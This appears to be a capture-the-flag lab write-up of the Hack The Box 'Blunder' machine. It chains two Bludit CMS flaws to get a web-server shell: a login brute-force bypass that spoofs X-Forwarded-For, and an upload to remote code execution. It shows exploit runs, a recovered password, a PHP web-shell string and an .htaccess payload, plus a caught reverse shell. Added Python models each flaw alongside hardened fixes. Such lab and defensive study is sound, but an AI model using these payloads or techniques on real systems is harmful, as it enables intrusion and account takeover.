Bruteforce Attack + RCE
The target web application has been confirmed to be an outdated Bludit CMS instance (<= 3.9.2, per the exploit banner below) affected by multiple known vulnerabilities. I have identified two of them that can be chained together to gain a foothold on the target system:
- [[blunder_cve-2019-17240#[cve-2019-17240](https //nvd.nist.gov/vuln/detail/cve-2019-17240)|cve-2019-17240]]: bypass of the login brute-force protection on the web administrative panel
- [[blunder_cve-2019-16113#[cve-2019-16113](https //nvd.nist.gov/vuln/detail/cve-2019-16113)|cve-2019-16113]]: authenticated Remote Code Execution via the image upload handler
Bruteforce Attack
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ ruby CVE-2019-17240.rb --help
Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass
Usage:
CVE-2019-17240.rb -r <url> -u <username> -w <path> [--debug]
CVE-2019-17240.rb -H | --help
Options:
-r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder
-u <username>, --user <username> Username of the admin
-w <path>, --wordlist <path> Path to the wordlist file
--debug Display arguments
-H, --help Show this screen
Examples:
CVE-2019-17240.rb -r http://example.org -u admin -w myWordlist.txt
CVE-2019-17240.rb -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt
The [[Blunder_CVE-2019-17240#[Exploit](https //www.exploit-db.com/exploits/48746)|Ruby script]] requires the target URL, a username and a wordlist
- I can use `fergus` for the username flag, as the `fergus` user is suspected to be an admin user
- A generic password list (i.e. `rockyou.txt`) is a shot in the dark here: the bypass still costs one HTTP request per guess, so millions of candidates are impractical, and a hand-picked password is unlikely to be in such a list anyway
- During the web enumeration, I found the `/about` page very suggestive
- I will attempt to create a wordlist out of the website
Wordlist Generation
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ cewl http://$IP -d 1 -m 6 --with-numbers -w wordlist.txt -v
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://10.10.10.191
Visiting: http://10.10.10.191, got response code 200
Attribute text found:
Visiting: http://10.10.10.191/about referred from http://10.10.10.191, got response code 200
Attribute text found:
Visiting: http://10.10.10.191/stephen-king-0 referred from http://10.10.10.191, got response code 200
Attribute text found:
Visiting: http://10.10.10.191/stadia referred from http://10.10.10.191, got response code 200
Attribute text found:
Visiting: http://10.10.10.191/usb referred from http://10.10.10.191, got response code 200
Attribute text found:
Offsite link, not following: https://www.computerhope.com/history/1996.htm
Offsite link, not following: https://www.twitter.com/WhortonMr
Writing words to file
CeWL is a Ruby script that spiders a given URL (here to depth 1, `-d 1`, so only the index page and the pages it links to) and returns the words it finds as a target-specific wordlist. `-m 6` keeps only words of at least 6 characters, `--with-numbers` also keeps words containing digits, `-w wordlist.txt` writes the result to a file and `-v` prints each page visited. Off-site links are not followed, which keeps the list focused on content written by the site's own author.
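As an added illustration of what CeWL does under the hood (this is my own example, not CeWL's code and not part of the original writeup), the following Python script extracts candidate words from a page the way `cewl -m 6 --with-numbers` would: visible text plus `alt`/`title` attribute text (the "Attribute text found" lines above), `<script>`/`<style>` bodies ignored, words shorter than the minimum dropped, duplicates removed in first-seen order. The HTML it parses is a constructed sample, not the target's `/about` page; spidering to depth 1 would simply mean fetching each same-host link and feeding its HTML through the same function.

```python
"""Minimal CeWL-style wordlist generator (added example; not CeWL's code)."""
import re
from html.parser import HTMLParser

# Constructed sample page. Stands in for a spidered blog page; NOT the real target's content.
SAMPLE_HTML = """<html><head><title>About - Blunder demo</title>
<script>var token = "scriptOnlyWord";</script>
<style>.hidden { display: none; }</style></head>
<body>
<h1>About</h1>
<p>This blog is about fictional characters, probably from novels
   I read growing up. Favourite gunslinger: the last one, 1982.</p>
<img src="tower.png" alt="Gunslinger1982" title="Midworld">
<p>Short words like the, a, an are dropped; 2019 is too short as well.</p>
</body></html>
"""


class WordCollector(HTMLParser):
    """Collects visible text plus alt/title attribute text, skipping <script>/<style> bodies."""

    SKIP_TAGS = {"script", "style"}
    TEXT_ATTRS = {"alt", "title"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP_TAGS:
            self._skip_depth += 1
        for name, value in attrs:
            if name in self.TEXT_ATTRS and value:
                self.chunks.append(value)  # what cewl -v reports as "Attribute text found"

    def handle_endtag(self, tag):
        if tag in self.SKIP_TAGS and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def extract_words(html, min_length=6, with_numbers=True):
    """Unique candidate words in first-seen order, like `cewl -m <min_length> [--with-numbers]`.
    Letters-only mode treats digits as separators (a simplification of CeWL's own handling)."""
    parser = WordCollector()
    parser.feed(html)
    pattern = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    seen, words = set(), []
    for chunk in parser.chunks:
        for word in re.findall(pattern, chunk):
            if len(word) >= min_length and word not in seen:
                seen.add(word)
                words.append(word)
    return words


def write_wordlist(path, words):
    """One candidate per line, the format the brute-force script consumes."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    print("\n".join(extract_words(SAMPLE_HTML)))
```

Case matters to the login form, so a practitioner usually post-processes such a list (lowercase, capitalised and concatenated-neighbour variants) before spending requests on it; CeWL itself does not do that.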
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ ruby CVE-2019-17240.rb -r http://$IP -u fergus -w wordlist.txt
[*] Trying password: Plugins
[*] Trying password: Include
[*] Trying password: service
[*] Trying password: Stadia
[...REDACTED...]
[*] Trying password: Letters
[*] Trying password: probably
[*] Trying password: fictional
[*] Trying password: character
[*] Trying password: RolandDeschain
[+] Password found: RolandDeschain
Found the password for the `fergus` user to the web administrative panel: `RolandDeschain`
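Why the brute force got through Bludit's lockout at all, as an added example that is mine rather than the writeup's or Bludit's code: CVE-2019-17240 exists because Bludit 3.9.2 counted failed logins per client IP but resolved that IP from attacker-supplied headers (`X-Forwarded-For`, `Client-IP`) before the socket address, so a different header value on every request gets a fresh counter. The Python below models that logic: a vulnerable IP resolver beside a hardened one, a simulated login guard, and a brute-force loop that rotates `X-Forwarded-For` per guess. The failure threshold, lockout time, wordlist and addresses are assumptions, not Bludit's exact values or the real target.

```python
"""Model of a per-IP login lockout and the CVE-2019-17240 header-spoofing bypass.
Added example: not Bludit's PHP and not the page's Ruby exploit. Thresholds are assumptions."""
import time

FAILURES_ALLOWED = 10   # assumption: failed logins tolerated per IP before lockout
BLOCK_SECONDS = 5 * 60  # assumption: lockout duration


def client_ip_vulnerable(headers, remote_addr):
    """Pre-fix behaviour (simplified): proxy headers, which any client can set, win over the TCP peer."""
    for name in ("X-Forwarded-For", "Client-IP"):
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(headers, remote_addr, trusted_proxies=frozenset()):
    """Use the TCP peer address unless it is a known reverse proxy; in that case take the
    address that proxy appended (the last element), since earlier ones can still be forged."""
    xff = headers.get("X-Forwarded-For", "")
    if remote_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return remote_addr


class LoginGuard:
    """Counts failures per resolved client IP and refuses logins once the limit is reached."""

    def __init__(self, ip_resolver, now=time.time):
        self.ip_resolver = ip_resolver
        self.now = now
        self.failures = {}  # ip -> (count, timestamp of last failure)

    def is_blocked(self, ip):
        count, last = self.failures.get(ip, (0, 0.0))
        return count >= FAILURES_ALLOWED and (self.now() - last) < BLOCK_SECONDS

    def attempt(self, headers, remote_addr, password, real_password):
        ip = self.ip_resolver(headers, remote_addr)
        if self.is_blocked(ip):
            return "blocked"
        if password == real_password:
            self.failures.pop(ip, None)
            return "success"
        count, _ = self.failures.get(ip, (0, 0.0))
        self.failures[ip] = (count + 1, self.now())
        return "fail"


def brute_force(guard, wordlist, real_password, attacker_addr, spoof_xff):
    """One request per candidate. With spoof_xff every request carries a fresh
    X-Forwarded-For value, as the public PoCs do. Returns (found_password, blocked_count)."""
    blocked = 0
    for i, candidate in enumerate(wordlist):
        headers = {"X-Forwarded-For": f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"} if spoof_xff else {}
        result = guard.attempt(headers, attacker_addr, candidate, real_password)
        if result == "success":
            return candidate, blocked
        if result == "blocked":
            blocked += 1
    return None, blocked


# Constructed wordlist: 50 filler candidates with the real password at position 40 (index 40).
REAL_PASSWORD = "RolandDeschain"
WORDLIST = [f"candidate{n}" for n in range(40)] + [REAL_PASSWORD] + [f"candidate{n}" for n in range(40, 50)]
ATTACKER_ADDR = "10.10.14.17"  # assumption: the attacker's real socket address


def run_scenarios():
    """Vulnerable resolver + rotating headers finds the password; the hardened resolver, or
    the vulnerable one without spoofing, locks the attacker out after FAILURES_ALLOWED tries."""
    return {
        "vulnerable": brute_force(LoginGuard(client_ip_vulnerable), WORDLIST, REAL_PASSWORD, ATTACKER_ADDR, True),
        "vulnerable_no_spoof": brute_force(LoginGuard(client_ip_vulnerable), WORDLIST, REAL_PASSWORD, ATTACKER_ADDR, False),
        "hardened": brute_force(LoginGuard(client_ip_hardened), WORDLIST, REAL_PASSWORD, ATTACKER_ADDR, True),
    }


if __name__ == "__main__":
    for name, (found, blocked) in run_scenarios().items():
        print(f"{name}: found={found!r} blocked_responses={blocked}")
```

The defender's check that follows from this: the application should only honour `X-Forwarded-For` when the request really came from its own reverse proxy, and that proxy must overwrite (not append to) the header; any per-IP throttle keyed on a client-controlled value is no throttle.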
Authenticated
Authenticated to the web administrative panel
RCE
Now that I have authenticated to the web administrative panel with the credential of the `fergus` user, I can proceed to gain a foothold via RCE
I have modified the Python script to match the current environment (target URL, the `fergus` credential and the reverse-shell callback to my listener on port 9999)
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ python2 CVE-2019-16113.py
[+] Login successful!
[+] Upload of malicious file upbyntvprf.png successful!
[+] Modification of .htaccess successful!
[+] Sending request to spawn shell. You may Crtl+C this program once shell is recieved.
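The three steps in that output (authenticated upload of a `.png` that is really PHP, then a `.htaccess` that makes Apache execute `.png` files as PHP) work because, as I understand CVE-2019-16113, the 3.9.2 upload handler built the destination directory from a request-controlled `uuid` value and accepted non-image content, which is exactly what the successful `.htaccess` upload shows. The following is an added example of mine, not Bludit's PHP and not the PoC: the vulnerable destination logic re-expressed in Python (modelled with no content check at all) next to a hardened version with a strict `uuid` format, path containment, a magic-byte check that must agree with the extension, and no dotfiles. The paths, the uuid format, the sample payloads and the `.htaccess` directive are assumptions and constructed data.

```python
"""Vulnerable vs hardened upload-destination checks for an image upload endpoint.
Added example modelling the root cause of CVE-2019-16113; not Bludit's code and not the PoC."""
import os
import re

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Magic bytes -> canonical extension (assumption: this small table is enough for the demo)
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
UUID_RE = re.compile(r"^[A-Za-z0-9]{8,64}$")  # assumption: a page identifier is a plain token, never a path
PHP_TAG = b"<?php"
UPLOAD_ROOT = "/var/www/bludit/bl-content/uploads/pages"  # assumption: where page images are stored

# Constructed payloads, stand-ins for what the PoC uploads.
PHP_SHELL_AS_PNG = b"<?php system($_GET['cmd']); ?>\n"
HTACCESS = b"RewriteEngine off\nAddType application/x-httpd-php .png\n"  # makes Apache+mod_php run .png as PHP
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # just the signature; enough for the magic check
POLYGLOT_PNG = REAL_PNG + PHP_SHELL_AS_PNG


def _ext(filename):
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return "jpg" if ext == "jpeg" else ext


def vulnerable_destination(upload_root, uuid, filename):
    """No content check; uuid flows straight into the path, so '../' escapes upload_root."""
    return os.path.normpath(os.path.join(upload_root, uuid, filename))


def hardened_destination(upload_root, uuid, filename, data):
    """Only an image whose bytes match its extension, stored inside upload_root, gets a path."""
    if not UUID_RE.match(uuid):
        raise ValueError("bad uuid")
    base = os.path.basename(filename)
    if not base or base != filename or base.startswith("."):  # rejects dir components and .htaccess
        raise ValueError("bad filename")
    ext = _ext(base)
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    detected = next((kind for magic, kind in MAGIC.items() if data.startswith(magic)), None)
    if detected != ext:
        raise ValueError("content does not match extension")
    if PHP_TAG in data:  # a valid PNG can still carry PHP in a chunk; never serve uploads as code
        raise ValueError("embedded PHP")
    root = os.path.abspath(upload_root)
    dest = os.path.abspath(os.path.join(root, uuid, base))  # on a real host use realpath to defeat symlinks
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("outside upload root")
    return dest


def demo():
    """Run both versions over the same requests; returns accepted paths or the rejection reason."""
    results = {
        "vuln_png": vulnerable_destination(UPLOAD_ROOT, "../../tmp", "upbyntvprf.png"),
        "vuln_htaccess": vulnerable_destination(UPLOAD_ROOT, "../../tmp", ".htaccess"),
    }
    cases = {
        "hard_traversal": ("../../tmp", "upbyntvprf.png", REAL_PNG),
        "hard_htaccess": ("abc123def456", ".htaccess", HTACCESS),
        "hard_php_as_png": ("abc123def456", "upbyntvprf.png", PHP_SHELL_AS_PNG),
        "hard_polyglot": ("abc123def456", "photo.png", POLYGLOT_PNG),
        "hard_real_png": ("abc123def456", "photo.png", REAL_PNG),
    }
    for name, (uuid, filename, data) in cases.items():
        try:
            results[name] = hardened_destination(UPLOAD_ROOT, uuid, filename, data)
        except ValueError as exc:
            results[name] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Two server-side checks complement the code: serve the upload directory with `AllowOverride None` so an uploaded `.htaccess` is ignored, and disable the PHP handler there altogether, so that even a file that slips past validation is returned as bytes rather than executed.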
Executing
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 41946
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:12:45 up 1:39, 1 user, load average: 22.02, 21.82, 17.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
shaun :0 :0 05:33 ?xdm? 5:09 0.01s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
blunder
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 2131297 bytes 177834287 (177.8 MB)
RX errors 0 dropped 38 overruns 0 frame 0
TX packets 1475722 bytes 1013586485 (1.0 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10011 bytes 884200 (884.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10011 bytes 884200 (884.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the `www-data` user (the web server account, as expected for code executed through Apache) by chaining [[Blunder_CVE-2019-17240#[CVE-2019-17240](https //nvd.nist.gov/vuln/detail/CVE-2019-17240)|CVE-2019-17240]] + [[Blunder_CVE-2019-16113#[CVE-2019-16113](https //nvd.nist.gov/vuln/detail/CVE-2019-16113)|CVE-2019-16113]]